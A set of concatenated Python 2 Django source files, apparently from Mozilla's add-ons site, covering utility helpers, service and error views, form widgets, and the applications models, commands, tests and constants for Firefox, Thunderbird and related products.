def slugify(s, ok=SLUG_OK, lower=True, spaces=False, delimiter='-'):
# L and N signify letter/number.
# http://www.unicode.org/reports/tr44/tr44-4.html#GC_Values_Table
rv = []
for c in smart_unicode(s):
cat = unicodedata.category(c)[0]
if cat in 'LN' or c in ok:
rv.append(c)
if cat == 'Z': # space
rv.append(' ')
new = ''.join(rv).strip()
if not spaces:
new = re.sub('[-\s]+', delimiter, new)
return new.lower() if lower else new
def slug_validator(s, ok=SLUG_OK, lower=True, spaces=False, delimiter='-',
message=validate_slug.message, code=validate_slug.code):
"""
Raise an error if the string has any punctuation characters.
Regexes don't work here because they won't check alnums in the right
locale.
"""
if not (s and slugify(s, ok, lower, spaces, delimiter) == s):
raise ValidationError(message, code=code)
def raise_required():
raise ValidationError(Field.default_error_messages['required'])
def clear_messages(request):
"""
Clear any messages out of the messages framework for the authenticated
user.
Docs: http://bit.ly/dEhegk
"""
for message in messages.get_messages(request):
pass
def clean_nl(string):
"""
This will clean up newlines so that nl2br can properly be called on the
cleaned text.
"""
html_blocks = ['{http://www.w3.org/1999/xhtml}blockquote',
'{http://www.w3.org/1999/xhtml}ol',
'{http://www.w3.org/1999/xhtml}li',
'{http://www.w3.org/1999/xhtml}ul']
if not string:
return string
def parse_html(tree):
# In etree, a tag may have:
# - some text content (piece of text before its first child)
# - a tail (piece of text just after the tag, and before a sibling)
# - children
# Eg: "<div>text <b>children's text</b> children's tail</div> tail".
# Strip new lines directly inside block level elements: first new lines
# from the text, and:
# - last new lines from the tail of the last child if there's children
# (done in the children loop below).
# - or last new lines from the text itself.
if tree.tag in html_blocks:
if tree.text:
tree.text = tree.text.lstrip('\n')
if not len(tree): # No children.
tree.text = tree.text.rstrip('\n')
# Remove the first new line after a block level element.
if tree.tail and tree.tail.startswith('\n'):
tree.tail = tree.tail[1:]
for child in tree: # Recurse down the tree.
if tree.tag in html_blocks:
# Strip new lines directly inside block level elements: remove
# the last new lines from the children's tails.
if child.tail:
child.tail = child.tail.rstrip('\n')
parse_html(child)
return tree
parse = parse_html(html5lib.parseFragment(string))
# Serialize the parsed tree back to html.
walker = html5lib.treewalkers.getTreeWalker('etree')
stream = walker(parse)
serializer = HTMLSerializer(quote_attr_values=True,
omit_optional_tags=False)
return serializer.render(stream)
# From: http://bit.ly/eTqloE
# Without this, you'll notice a slight grey line on the edges of
# the adblock plus icon.
def patched_chunk_tRNS(self, pos, len):
i16 = PngImagePlugin.i16
s = ImageFile._safe_read(self.fp, len)
if self.im_mode == "P":
self.im_info["transparency"] = map(ord, s)
elif self.im_mode == "L":
self.im_info["transparency"] = i16(s)
elif self.im_mode == "RGB":
self.im_info["transparency"] = i16(s), i16(s[2:]), i16(s[4:])
return s
PngImagePlugin.PngStream.chunk_tRNS = patched_chunk_tRNS
def patched_load(self):
if self.im and self.palette and self.palette.dirty:
apply(self.im.putpalette, self.palette.getdata())
self.palette.dirty = 0
self.palette.rawmode = None
try:
trans = self.info["transparency"]
except KeyError:
self.palette.mode = "RGB"
else:
try:
for i, a in enumerate(trans):
self.im.putpalettealpha(i, a)
except TypeError:
self.im.putpalettealpha(trans, 0)
self.palette.mode = "RGBA"
if self.im:
return self.im.pixel_access(self.readonly)
Image.Image.load = patched_load
def resize_image(src, dst, size=None, remove_src=True, locally=False):
"""Resizes and image from src, to dst. Returns width and height.
When locally is True, src and dst are assumed to reside
on the local disk (not in the default storage). When dealing
with local files it's up to you to ensure that all directories
exist leading up to the dst filename.
"""
if src == dst:
raise Exception("src and dst can't be the same: %s" % src)
open_ = open if locally else storage.open
delete = os.unlink if locally else storage.delete
with open_(src, 'rb') as fp:
im = Image.open(fp)
im = im.convert('RGBA')
if size:
im = processors.scale_and_crop(im, size)
with open_(dst, 'wb') as fp:
im.save(fp, 'png')
if remove_src:
delete(src)
return im.size
def remove_icons(destination):
for size in ADDON_ICON_SIZES:
filename = '%s-%s.png' % (destination, size)
if storage.exists(filename):
storage.delete(filename)
class ImageCheck(object):
def __init__(self, image):
self._img = image
def is_image(self):
try:
self._img.seek(0)
self.img = Image.open(self._img)
# PIL doesn't tell us what errors it will raise at this point,
# just "suitable ones", so let's catch them all.
self.img.verify()
return True
except:
log.error('Error decoding image', exc_info=True)
return False
def is_animated(self, size=100000):
if not self.is_image():
return False
img = self.img
if img.format == 'PNG':
self._img.seek(0)
data = ''
while True:
chunk = self._img.read(size)
if not chunk:
break
data += chunk
acTL, IDAT = data.find('acTL'), data.find('IDAT')
if acTL > -1 and acTL < IDAT:
return True
return False
elif img.format == 'GIF':
# See the PIL docs for how this works:
# http://www.pythonware.com/library/pil/handbook/introduction.htm
try:
img.seek(1)
except EOFError:
return False
return True
class MenuItem():
"""Refinement item with nestable children for use in menus."""
url, text, selected, children = ('', '', False, [])
def to_language(locale):
"""Like django's to_language, but en_US comes out as en-US."""
# A locale looks like en_US or fr.
if '_' in locale:
return to_language(translation.trans_real.to_language(locale))
# Django returns en-us but we want to see en-US.
elif '-' in locale:
lang, region = locale.split('-')
return '%s-%s' % (lang, region.upper())
else:
return translation.trans_real.to_language(locale)
def get_locale_from_lang(lang):
"""Pass in a language (u'en-US') get back a Locale object courtesy of
Babel. Use this to figure out currencies, bidi, names, etc."""
# Special fake language can just act like English for formatting and such
if not lang or lang == 'dbg':
lang = 'en'
return Locale(translation.to_locale(lang))
class HttpResponseSendFile(http.HttpResponse):
def __init__(self, request, path, content=None, status=None,
content_type='application/octet-stream', etag=None):
self.request = request
self.path = path
super(HttpResponseSendFile, self).__init__('', status=status,
content_type=content_type)
if settings.XSENDFILE:
self[settings.XSENDFILE_HEADER] = path
if etag:
self['ETag'] = '"%s"' % etag
def __iter__(self):
if settings.XSENDFILE:
return iter([])
chunk = 4096
fp = open(self.path, 'rb')
if 'wsgi.file_wrapper' in self.request.META:
return self.request.META['wsgi.file_wrapper'](fp, chunk)
else:
self['Content-Length'] = os.path.getsize(self.path)
def wrapper():
while 1:
data = fp.read(chunk)
if not data:
break
yield data
return wrapper()
def redirect_for_login(request):
# We can't use urlparams here, because it escapes slashes,
# which a large number of tests don't expect
url = '%s?to=%s' % (reverse('users.login'),
urlquote(request.get_full_path()))
return http.HttpResponseRedirect(url)
def cache_ns_key(namespace, increment=False):
"""
Returns a key with namespace value appended. If increment is True, the
namespace will be incremented effectively invalidating the cache.
Memcache doesn't have namespaces, but we can simulate them by storing a
"%(key)s_namespace" value. Invalidating the namespace simply requires
editing that key. Your application will no longer request the old keys,
and they will eventually fall off the end of the LRU and be reclaimed.
"""
ns_key = 'ns:%s' % namespace
if increment:
try:
ns_val = cache.incr(ns_key)
except ValueError:
log.info('Cache increment failed for key: %s. Resetting.' % ns_key)
ns_val = epoch(datetime.datetime.now())
cache.set(ns_key, ns_val, None)
else:
ns_val = cache.get(ns_key)
if ns_val is None:
ns_val = epoch(datetime.datetime.now())
cache.set(ns_key, ns_val, None)
return '%s:%s' % (ns_val, ns_key)
def get_email_backend(real_email=False):
"""Get a connection to an email backend.
If settings.SEND_REAL_EMAIL is False, a debugging backend is returned.
"""
if real_email or settings.SEND_REAL_EMAIL:
backend = None
else:
backend = 'amo.mail.FakeEmailBackend'
return django.core.mail.get_connection(backend)
class ESPaginator(paginator.Paginator):
"""A better paginator for search results."""
# The normal Paginator does a .count() query and then a slice. Since ES
# results contain the total number of results, we can take an optimistic
# slice and then adjust the count.
def page(self, number):
# Fake num_pages so it looks like we can have results.
self._num_pages = float('inf')
number = self.validate_number(number)
self._num_pages = None
bottom = (number - 1) * self.per_page
top = bottom + self.per_page
page = paginator.Page(self.object_list[bottom:top], number, self)
# Force the search to evaluate and then attach the count.
list(page.object_list)
self._count = page.object_list.count()
return page
def smart_path(string):
"""Returns a string you can pass to path.path safely."""
if os.path.supports_unicode_filenames:
return smart_unicode(string)
return smart_str(string)
def log_cef(name, severity, env, *args, **kwargs):
"""Simply wraps the cef_log function so we don't need to pass in the config
dictionary every time. See bug 707060. env can be either a request
object or just the request.META dictionary"""
c = {'cef.product': getattr(settings, 'CEF_PRODUCT', 'AMO'),
'cef.vendor': getattr(settings, 'CEF_VENDOR', 'Mozilla'),
'cef.version': getattr(settings, 'CEF_VERSION', '0'),
'cef.device_version': getattr(settings, 'CEF_DEVICE_VERSION', '0'),
'cef.file': getattr(settings, 'CEF_FILE', 'syslog'), }
# The CEF library looks for some things in the env object like
# REQUEST_METHOD and any REMOTE_ADDR stuff. Django not only doesn't send
# half the stuff you'd expect, but it specifically doesn't implement
# readline on its FakePayload object so these things fail. I have no idea
# if that's outdated code in Django or not, but andym made this
# <strike>awesome</strike> less crappy so the tests will actually pass.
# In theory, the last part of this if() will never be hit except in the
# test runner. Good luck with that.
if isinstance(env, HttpRequest):
r = env.META.copy()
if 'PATH_INFO' in r:
r['PATH_INFO'] = env.build_absolute_uri(r['PATH_INFO'])
elif isinstance(env, dict):
r = env
else:
r = {}
if settings.USE_HEKA_FOR_CEF:
return heka.cef(name, severity, r, *args, config=c, **kwargs)
else:
return _log_cef(name, severity, r, *args, config=c, **kwargs)
@contextlib.contextmanager
def no_translation(lang=None):
"""
Activate the settings lang, or lang provided, while in context.
"""
old_lang = translation.trans_real.get_language()
if lang:
translation.trans_real.activate(lang)
else:
translation.trans_real.deactivate()
yield
translation.trans_real.activate(old_lang)
def escape_all(v):
"""Escape html in JSON value, including nested items."""
if isinstance(v, basestring):
v = jinja2.escape(smart_unicode(v))
v = linkify_with_outgoing(v)
return v
elif isinstance(v, list):
for i, lv in enumerate(v):
v[i] = escape_all(lv)
elif isinstance(v, dict):
for k, lv in v.iteritems():
v[k] = escape_all(lv)
elif isinstance(v, Translation):
v = jinja2.escape(smart_unicode(v.localized_string))
return v
class LocalFileStorage(FileSystemStorage):
"""Local storage to an unregulated absolute file path.
Unregulated means that, unlike the default file storage, you can write to
any path on the system if you have access.
Unlike Django's default FileSystemStorage, this class behaves more like a
"cloud" storage system. Specifically, you never have to write defensive
code that prepares for leading directory paths to exist.
"""
def __init__(self, base_url=None):
super(LocalFileStorage, self).__init__(location='/', base_url=base_url)
def delete(self, name):
"""Delete a file or empty directory path.
Unlike the default file system storage this will also delete an empty
directory path. This behavior is more in line with other storage
systems like S3.
"""
full_path = self.path(name)
if os.path.isdir(full_path):
os.rmdir(full_path)
else:
return super(LocalFileStorage, self).delete(name)
def _open(self, name, mode='rb'):
if mode.startswith('w'):
parent = os.path.dirname(self.path(name))
try:
# Try/except to prevent race condition raising "File exists".
os.makedirs(parent)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(parent):
pass
else:
raise
return super(LocalFileStorage, self)._open(name, mode=mode)
def path(self, name):
"""Actual file system path to name without any safety checks."""
return os.path.normpath(os.path.join(self.location,
self._smart_path(name)))
def _smart_path(self, string):
if os.path.supports_unicode_filenames:
return smart_unicode(string)
return smart_str(string)
def strip_bom(data):
"""
Strip the BOM (byte order mark) from byte string `data`.
Returns a new byte string.
"""
for bom in (codecs.BOM_UTF32_BE,
codecs.BOM_UTF32_LE,
codecs.BOM_UTF16_BE,
codecs.BOM_UTF16_LE,
codecs.BOM_UTF8):
if data.startswith(bom):
data = data[len(bom):]
break
return data
def smart_decode(s):
"""Guess the encoding of a string and decode it."""
if isinstance(s, unicode):
return s
enc_guess = chardet.detect(s)
try:
return s.decode(enc_guess['encoding'])
except (UnicodeDecodeError, TypeError), exc:
msg = 'Error decoding string (encoding: %r %.2f%% sure): %s: %s'
log.error(msg % (enc_guess['encoding'],
enc_guess['confidence'] * 100.0,
exc.__class__.__name__, exc))
return unicode(s, errors='replace')
def attach_trans_dict(model, objs):
"""Put all translations into a translations dict."""
# Get the ids of all the translations we need to fetch.
fields = model._meta.translated_fields
ids = [getattr(obj, f.attname) for f in fields
for obj in objs if getattr(obj, f.attname, None) is not None]
# Get translations in a dict, ids will be the keys. It's important to
# consume the result of sorted_groupby, which is an iterator.
qs = Translation.objects.filter(id__in=ids, localized_string__isnull=False)
all_translations = dict((k, list(v)) for k, v in
sorted_groupby(qs, lambda trans: trans.id))
def get_locale_and_string(translation, new_class):
"""Convert the translation to new_class (making PurifiedTranslations
and LinkifiedTranslations work) and return locale / string tuple."""
converted_translation = new_class()
converted_translation.__dict__ = translation.__dict__
return (converted_translation.locale.lower(),
unicode(converted_translation))
# Build and attach translations for each field on each object.
for obj in objs:
obj.translations = collections.defaultdict(list)
for field in fields:
t_id = getattr(obj, field.attname, None)
field_translations = all_translations.get(t_id, None)
if not t_id or field_translations is None:
continue
obj.translations[t_id] = [get_locale_and_string(t, field.rel.to)
for t in field_translations]
def rm_local_tmp_dir(path):
"""Remove a local temp directory.
This is just a wrapper around shutil.rmtree(). Use it to indicate you are
certain that your executing code is operating on a local temp dir, not a
directory managed by the Django Storage API.
"""
return shutil.rmtree(path)
def rm_local_tmp_file(path):
"""Remove a local temp file.
This is just a wrapper around os.unlink(). Use it to indicate you are
certain that your executing code is operating on a local temp file, not a
path managed by the Django Storage API.
"""
return os.unlink(path)
def timestamp_index(index):
"""Returns index-YYYYMMDDHHMMSS with the current time."""
return '%s-%s' % (index, datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
def timer(*func, **kwargs):
"""
Outputs statsd timings for the decorated method, ignored if not
in test suite. It will give us a name that's based on the module name.
It will work without params. Or with the params:
key: a key to override the calculated one
test_only: only time while in test suite (default is True)
"""
key = kwargs.get('key', None)
test_only = kwargs.get('test_only', True)
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if test_only and not settings.IN_TEST_SUITE:
return func(*args, **kw)
else:
name = (key if key else
'%s.%s' % (func.__module__, func.__name__))
with statsd.timer('timer.%s' % name):
return func(*args, **kw)
return wrapper
if func:
return decorator(func[0])
return decorator
def find_language(locale):
"""
Return a locale we support, or None.
"""
if not locale:
return None
LANGS = settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES
if locale in LANGS:
return locale
# Check if locale has a short equivalent.
loc = settings.SHORTER_LANGUAGES.get(locale)
if loc:
return loc
# Check if locale is something like en_US that needs to be converted.
locale = to_language(locale)
if locale in LANGS:
return locale
return None
def has_links(html):
"""Return True if links (text or markup) are found in the given html."""
# Call bleach.linkify to transform text links to real links, and add some
# content to the ``href`` attribute. If the result is different from the
# initial string, links were found.
class LinkFound(Exception):
pass
def raise_on_link(attrs, new):
raise LinkFound
try:
bleach.linkify(html, callbacks=[raise_on_link])
except LinkFound:
return True
return False
########NEW FILE########
__FILENAME__ = views
import json
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.http import HttpResponse, HttpResponseBadRequest
from django.shortcuts import render
from django.utils.encoding import iri_to_uri
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
import commonware.log
import waffle
from django_statsd.views import record as django_statsd_record
from django_statsd.clients import statsd
import amo
import api
from amo.decorators import post_required
from amo.utils import log_cef
from amo.context_processors import get_collect_timings
from . import monitors
log = commonware.log.getLogger('z.amo')
monitor_log = commonware.log.getLogger('z.monitor')
jp_log = commonware.log.getLogger('z.jp.repack')
@never_cache
def monitor(request, format=None):
# For each check, a boolean pass/fail status to show in the template
status_summary = {}
results = {}
checks = ['memcache', 'libraries', 'elastic', 'package_signer', 'path',
'redis', 'receipt_signer', 'settings_check', 'solitude']
for check in checks:
with statsd.timer('monitor.%s' % check) as timer:
status, result = getattr(monitors, check)()
# state is a string. If it is empty, that means everything is fine.
status_summary[check] = {'state': not status,
'status': status}
results['%s_results' % check] = result
results['%s_timer' % check] = timer.ms
# If anything broke, send HTTP 500.
status_code = 200 if all(a['state']
for a in status_summary.values()) else 500
if format == '.json':
return http.HttpResponse(json.dumps(status_summary),
status=status_code)
ctx = {}
ctx.update(results)
ctx['status_summary'] = status_summary
return render(request, 'services/monitor.html', ctx, status=status_code)
def robots(request):
"""Generate a robots.txt"""
_service = (request.META['SERVER_NAME'] == settings.SERVICES_DOMAIN)
if _service or not settings.ENGAGE_ROBOTS:
template = "User-agent: *\nDisallow: /"
else:
template = render(request, 'amo/robots.html', {'apps': amo.APP_USAGE})
return HttpResponse(template, mimetype="text/plain")
def handler403(request):
if request.path_info.startswith('/api/'):
# Pass over to handler403 view in api if api was targeted.
return api.views.handler403(request)
else:
return render(request, 'amo/403.html', status=403)
def handler404(request):
if request.path_info.startswith('/api/'):
# Pass over to handler404 view in api if api was targeted.
return api.views.handler404(request)
else:
return render(request, 'amo/404.html', status=404)
def handler500(request):
if request.path_info.startswith('/api/'):
# Pass over to handler500 view in api if api was targeted.
return api.views.handler500(request)
else:
return render(request, 'amo/500.html', status=500)
def csrf_failure(request, reason=''):
return render(request, 'amo/403.html',
{'because_csrf': 'CSRF' in reason}, status=403)
def loaded(request):
return http.HttpResponse('%s' % request.META['wsgi.loaded'],
content_type='text/plain')
@csrf_exempt
@require_POST
def cspreport(request):
"""Accept CSP reports and log them."""
report = ('blocked-uri', 'violated-directive', 'original-policy')
if not waffle.sample_is_active('csp-store-reports'):
return HttpResponse()
try:
v = json.loads(request.body)['csp-report']
# If possible, alter the PATH_INFO to contain the request of the page
# the error occurred on, spec: http://mzl.la/P82R5y
meta = request.META.copy()
meta['PATH_INFO'] = v.get('document-uri', meta['PATH_INFO'])
v = [(k, v[k]) for k in report if k in v]
log_cef('CSPViolation', 5, meta, username=request.user,
signature='CSPREPORT',
msg='A client reported a CSP violation',
cs6=v, cs6Label='ContentPolicy')
except (KeyError, ValueError), e:
log.debug('Exception in CSP report: %s' % e, exc_info=True)
return HttpResponseBadRequest()
return HttpResponse()
@csrf_exempt
@post_required
def record(request):
# The rate limiting is done up on the client, but if things go wrong
# we can just turn the percentage down to zero.
if get_collect_timings():
return django_statsd_record(request)
raise PermissionDenied
def plugin_check_redirect(request):
return http.HttpResponseRedirect('%s?%s' %
(settings.PFS_URL,
iri_to_uri(request.META.get('QUERY_STRING', ''))))
########NEW FILE########
__FILENAME__ = widgets
from django.forms.widgets import Input
class EmailWidget(Input):
"""HTML5 email type."""
input_type = 'email'
def __init__(self, *args, **kwargs):
self.placeholder = kwargs.pop('placeholder', None)
return super(EmailWidget, self).__init__(*args, **kwargs)
def render(self, name, value, attrs=None):
attrs = attrs or {}
if self.placeholder:
attrs['placeholder'] = self.placeholder
return super(EmailWidget, self).render(name, value, attrs)
class ColorWidget(Input):
"""HTML5 color type."""
input_type = 'color'
def __init__(self, *args, **kwargs):
self.placeholder = kwargs.pop('placeholder', None)
return super(ColorWidget, self).__init__(*args, **kwargs)
def render(self, name, value, attrs=None):
attrs = attrs or {}
if self.placeholder:
attrs['placeholder'] = self.placeholder
return super(ColorWidget, self).render(name, value, attrs)
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Application, AppVersion
class AppVersionAdmin(admin.StackedInline):
model = AppVersion
ordering = ('-version_int',)
class ApplicationAdmin(admin.ModelAdmin):
inlines = [AppVersionAdmin]
admin.site.register(Application, ApplicationAdmin)
########NEW FILE########
__FILENAME__ = addnewversion
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
import amo.models
from applications.models import AppVersion
class Command(BaseCommand):
help = ('Add a new version to a Application. Syntax: \n'
' ./manage.py addnewversion <application_name> <version>')
log = commonware.log.getLogger('z.appversions')
def handle(self, *args, **options):
try:
do_addnewversion(args[0], args[1])
except IndexError:
raise CommandError(self.help)
msg = 'Adding version %r to application %r\n' % (args[1], args[0])
self.log.info(msg)
self.stdout.write(msg)
def do_addnewversion(application, version):
if application not in amo.APPS:
raise CommandError('Application %r does not exist.' % application)
try:
AppVersion.objects.create(application_id=amo.APPS[application].id,
version=version)
except IntegrityError, e:
raise CommandError('Version %r already exists: %r' % (version, e))
########NEW FILE########
__FILENAME__ = dump_apps
import json
import os
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage as storage
import commonware.log
import amo
from applications.models import Application, AppVersion
log = commonware.log.getLogger('z.cron')
# The validator uses the file created here to keep up to date with the
# apps and versions on AMO.
class Command(BaseCommand):
help = 'Dump a json file containing AMO apps and versions.'
JSON_PATH = os.path.join(settings.NETAPP_STORAGE, 'apps.json')
def handle(self, *args, **kw):
apps = {}
for id, guid in (Application.objects.values_list('id', 'guid')
.exclude(supported=0)):
apps[id] = dict(guid=guid, versions=[],
name=amo.APPS_ALL[id].short)
versions = (AppVersion.objects.values_list('application', 'version')
.order_by('version_int'))
for app, version in versions:
try:
apps[app]['versions'].append(version)
except KeyError:
# Sunbird is still in the database but shouldn't show up here.
pass
# Local file, to be read by validator.
with storage.open(self.JSON_PATH, 'w') as f:
json.dump(apps, f)
log.debug("Wrote: %s" % f.name)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
from versions import compare
class Application(amo.models.ModelBase):
guid = models.CharField(max_length=255, default='')
supported = models.BooleanField(default=1)
# We never reference these translated fields, so stop loading them.
# name = TranslatedField()
# shortname = TranslatedField()
class Meta:
db_table = 'applications'
def __unicode__(self):
return unicode(amo.APPS_ALL[self.id].pretty)
class AppVersion(amo.models.ModelBase):
application = models.ForeignKey(Application)
version = models.CharField(max_length=255, default='')
version_int = models.BigIntegerField(editable=False)
class Meta:
db_table = 'appversions'
ordering = ['-version_int']
def save(self, *args, **kw):
if not self.version_int:
self.version_int = compare.version_int(self.version)
return super(AppVersion, self).save(*args, **kw)
def __init__(self, *args, **kwargs):
super(AppVersion, self).__init__(*args, **kwargs)
# Add all the major, minor, ..., version attributes to the object.
self.__dict__.update(compare.version_dict(self.version or ''))
def __unicode__(self):
return self.version
def flush_urls(self):
return ['*/pages/appversions/*']
########NEW FILE########
__FILENAME__ = tests
import json
from django.core.management import call_command
from nose.tools import eq_
import amo
import amo.tests
from amo.helpers import url
from applications.models import AppVersion, Application
from applications.management.commands import dump_apps
class TestAppVersion(amo.tests.TestCase):
def test_major_minor(self):
"""Check that major/minor/alpha is getting set."""
v = AppVersion(version='3.0.12b2')
eq_(v.major, 3)
eq_(v.minor1, 0)
eq_(v.minor2, 12)
eq_(v.minor3, None)
eq_(v.alpha, 'b')
eq_(v.alpha_ver, 2)
v = AppVersion(version='3.6.1apre2+')
eq_(v.major, 3)
eq_(v.minor1, 6)
eq_(v.minor2, 1)
eq_(v.alpha, 'a')
eq_(v.pre, 'pre')
eq_(v.pre_ver, 2)
v = AppVersion(version='')
eq_(v.major, None)
eq_(v.minor1, None)
eq_(v.minor2, None)
eq_(v.minor3, None)
class TestApplication(amo.tests.TestCase):
fixtures = ['applications/all_apps.json']
def test_string_representation(self):
"""
Check that the string representation of the app model instances
matches out constants
"""
for static_app in amo.APP_USAGE:
model_app = Application.objects.get(id=static_app.id)
eq_(unicode(model_app), unicode(static_app.pretty))
class TestViews(amo.tests.TestCase):
fixtures = ['base/apps', 'base/appversion']
def test_appversions(self):
eq_(self.client.get(url('apps.appversions')).status_code, 200)
def test_appversions_feed(self):
eq_(self.client.get(url('apps.appversions.rss')).status_code, 200)
class TestCommands(amo.tests.TestCase):
fixtures = ['applications/all_apps.json', 'base/apps', 'base/appversion']
def test_dump_apps(self):
call_command('dump_apps')
with open(dump_apps.Command.JSON_PATH, 'r') as f:
apps = json.load(f)
db_apps = Application.objects.all()
assert len(db_apps)
for app in db_apps:
data = apps[str(app.id)]
versions = sorted([a.version for a in
AppVersion.objects.filter(application=app)])
r_app = amo.APPS_ALL[app.id]
eq_("%s: %r" % (r_app.short, sorted(data['versions'])),
"%s: %r" % (r_app.short, versions))
eq_(data['name'], r_app.short)
eq_(data['guid'], app.guid)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url('^$', views.appversions, name='apps.appversions'),
url('^format:rss$', views.AppversionsFeed(), name='apps.appversions.rss'),
)
########NEW FILE########
__FILENAME__ = views
from django.contrib.syndication.views import Feed
from django.shortcuts import render
import caching.base as caching
from tower import ugettext as _
import amo
from amo.helpers import url, absolutify
from .models import AppVersion
def get_versions(order=('application', 'version_int')):
def f():
apps = amo.APP_USAGE
versions = dict((app.id, []) for app in apps)
qs = list(AppVersion.objects.order_by(*order)
.filter(application__in=versions)
.values_list('application', 'version'))
for app, version in qs:
versions[app].append(version)
return apps, versions
return caching.cached(f, 'getv' + ''.join(order))
def appversions(request):
apps, versions = get_versions()
return render(request, 'applications/appversions.html',
dict(apps=apps, versions=versions))
class AppversionsFeed(Feed):
# appversions aren't getting a created date so the sorting is kind of
# wanky. I blame fligtar.
def title(self):
return _('Application Versions')
def link(self):
return absolutify(url('apps.appversions'))
def description(self):
return _('Acceptable versions for all applications on AMO.')
def items(self):
apps, versions = get_versions(order=('application', '-version_int'))
return [(app, version) for app in apps
for version in versions[app.id][:3]]
return [(app, versions[app.id][:3]) for app in apps]
def item_title(self, item):
app, version = item
return u'%s %s' % (app.pretty, version)
item_description = ''
def item_link(self):
return self.link()
def item_guid(self, item):
return self.item_link() + '%s:%s' % item
########NEW FILE########
__FILENAME__ = applications
from versions.compare import version_int as vint
from tower import ugettext_lazy as _
from base import *
class App:
@classmethod
def matches_user_agent(cls, user_agent):
return cls.user_agent_string in user_agent
# Applications
class FIREFOX(App):
id = 1
shortername = 'fx'
short = 'firefox'
pretty = _(u'Firefox')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA, ADDON_WEBAPP]
guid = '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}'
min_display_version = 3.0
# These versions were relabeled and should not be displayed.
exclude_versions = (3.1, 3.7, 4.2)
backup_version = vint('3.7.*')
user_agent_string = 'Firefox'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
@classmethod
def matches_user_agent(cls, user_agent):
matches = cls.user_agent_string in user_agent
if ('Android' in user_agent or 'Mobile' in user_agent or
'Tablet' in user_agent):
matches = False
return matches
class THUNDERBIRD(App):
id = 18
short = 'thunderbird'
shortername = 'tb'
pretty = _(u'Thunderbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP,
ADDON_PERSONA]
guid = '{3550f703-e582-4d05-9a08-453d09bdfdc6}'
min_display_version = 1.0
user_agent_string = 'Thunderbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SEAMONKEY(App):
id = 59
short = 'seamonkey'
shortername = 'sm'
pretty = _(u'SeaMonkey')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA]
guid = '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}'
min_display_version = 1.0
exclude_versions = (1.5,)
latest_version = None
user_agent_string = 'SeaMonkey'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SUNBIRD(App):
"""This application is retired and should not be used on the site. It
remains as there are still some sunbird add-ons in the db."""
id = 52
short = 'sunbird'
shortername = 'sb'
pretty = _(u'Sunbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP]
guid = '{718e30fb-e89b-41dd-9da7-e25a45638b28}'
min_display_version = 0.2
latest_version = None
user_agent_string = 'Sunbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class MOBILE(App):
id = 60
short = 'mobile'
shortername = 'fn'
pretty = _(u'Mobile')
browser = True
types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PERSONA]
guid = '{a23983c0-fd0e-11dc-95ff-0800200c9a66}'
min_display_version = 0.1
user_agent_string = 'Fennec'
platforms = 'mobile' # DESKTOP_PLATFORMS (set in constants.platforms)
class ANDROID(App):
# This is for the Android native Firefox.
id = 61
short = 'android'
shortername = 'an'
pretty = _(u'Firefox for Android')
browser = True
types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PERSONA]
guid = '{aa3c5121-dab2-40e2-81ca-7ea25febc110}'
min_display_version = 11.0
user_agent_string = 'Fennec'
# Mobile and Android have the same user agent. The only way to distinguish
# is by the version number.
user_agent_re = [re.compile('Fennec/([\d.]+)'),
re.compile('Android; Mobile; rv:([\d.]+)'),
re.compile('Android; Tablet; rv:([\d.]+)'),
re.compile('Mobile; rv:([\d.]+)'),
re.compile('Tablet; rv:([\d.]+)')]
platforms = 'mobile'
latest_version = None
@classmethod
def matches_user_agent(cls, user_agent):
for user_agent_re in cls.user_agent_re:
match = user_agent_re.search(user_agent)
if match:
v = match.groups()[0]
return vint(cls.min_display_version) <= vint(v)
class MOZILLA(App):
"""Mozilla exists for completeness and historical purposes.
Stats and other modules may reference this for history.
This should NOT be added to APPS.
"""
id = 2
short = 'mz'
shortername = 'mz'
pretty = _(u'Mozilla')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN]
guid = '{86c18b42-e466-45a9-ae7a-9b95ba6f5640}'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class UNKNOWN_APP(App):
"""Placeholder for unknown applications."""
pretty = _(u'Unknown')
class DEVICE_DESKTOP(object):
id = 1
name = _(u'Desktop')
class_name = 'desktop'
api_name = 'desktop'
class DEVICE_MOBILE(object):
id = 2
name = _(u'Firefox Mobile')
class_name = 'android-mobile'
api_name = 'android-mobile'
class DEVICE_TABLET(object):
id = 3
name = _(u'Firefox Tablet')
class_name = 'android-tablet'
api_name = 'android-tablet'
class DEVICE_GAIA(object):
id = 4
name = _(u'Firefox OS')
class_name = 'firefoxos'
api_name = 'firefoxos'
